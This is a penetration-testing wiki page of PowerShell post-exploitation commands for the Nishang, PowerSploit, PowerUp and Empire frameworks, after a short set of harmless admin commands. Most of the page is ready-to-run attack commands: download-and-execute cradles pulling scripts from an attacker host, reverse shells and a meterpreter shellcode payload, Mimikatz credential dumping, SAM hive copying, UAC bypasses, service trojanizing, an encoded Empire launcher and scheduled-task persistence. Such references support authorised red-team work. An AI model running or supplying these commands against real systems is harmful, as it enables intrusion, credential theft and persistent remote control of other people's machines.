PowerShell frameworks for Post-exploitation

Penetration Testing Wiki

In this section we will review different powershell frameworks used to help us with the post-exploitation phase.

Intro to PowerShell

To check the version:

$PSVersionTable.PSVersion
Powershell v1.0: Win XP SP2, 2003 Server SP1, Vista
Powershell v2.0: Win 7, Server 2008 R2
Powershell v3.0: Win 8, Server 2012
Powershell v4.0: Win 8.1, Server 2012 R2
Powershell v5.0: Win 10

Change default colors:

$host.ui.RawUI.ForegroundColor = "black"
$host.ui.RawUI.BackgroundColor = "white"
clear

To compile a ps1 into .exe use ”PowerGUI Pro script editor”

  • List hotfixes
Get-HotFix

Equivalent using wmic:

wmic qfe list
  • Detect sandboxed environment
Get-wmiobject win32_bios | format-list Name,SerialNumber
  • Handling Certificates

To see installed user certificates

Get-ChildItem -Path "Cert:\CurrentUser\My"
Get-ChildItem -Path "Cert:\LocalMachine"

Using GUI:

certmgr.msc

To create a self-signed certificate:

$cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org
  • Show system uptime:
Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime

Some examples of PowerShell Scripts

Capturing a screenshot

Param(
[Parameter(Mandatory = $true)][string]$Path
)
$FileName = "$env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).bmp"
$File = "$Path\$FileName"
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
$bitmap.Save($File) 
Write-Output "Screenshot saved to:"
Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/

Nishang Framework

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

in kali: /usr/share/nishang

powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"

Fileless execution with nishang:

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"

Dont work in Windows 7:

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

In Windows 7:

powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowershellTcp.ps1; Invoke-PowershellTcp -IPAddress $LOCALIP -Reverse -Port 443"

Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA

Powersploit Framework

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1");\ Invoke-ReverseDnsLookup -IpRange $IP/24
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1");\ Invoke-Mimikatz -DumpCreds
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1");\ Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"

Powersploit modules: PowerUP

PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.

powershell.exe -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

Powersploit modules: BypassUAC

import-module .\bypass-uac.ps1

Does not work for Windows Server 2012:

Bypass-UAC -Method UacMethodSysprep

Work for Windows Server 2012:

Bypass-UAC -Method ucmDismMethod
Bypass-UAC -Method UacMethodMMC2

More info:

Powersploit modules: Trojanize DLL

See also Msfvenom Payloads Cheat Sheet.

Powersploit modules: Trojanize Windows Service

Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]

Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/

Empire Framework

Empire is a PowerShell and Python post-exploitation agent

Installation:

git clone https://github.com/EmpireProject/Empire.git
cd Empire/
./setup/install.sh

Usage:

./empire
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > execute
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==
(Empire: listeners/http) >

Copy the generated powershell payload in the Windows target to open a session in Empire:

powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==

To handle agents in Empire:

agents
interact $AGENTID
rename [old name] [new name]

Advanced modules:

bypassuac http
set Listener http
run

or disk-less:

usemodule privesc/bypassuac_wscript

For credentials gathering:

mimikatz

Persistence:

usemodule persistence/elevated/schtasks

References:

WinEnum

A Powershell Privilege Escalation Enumeration Script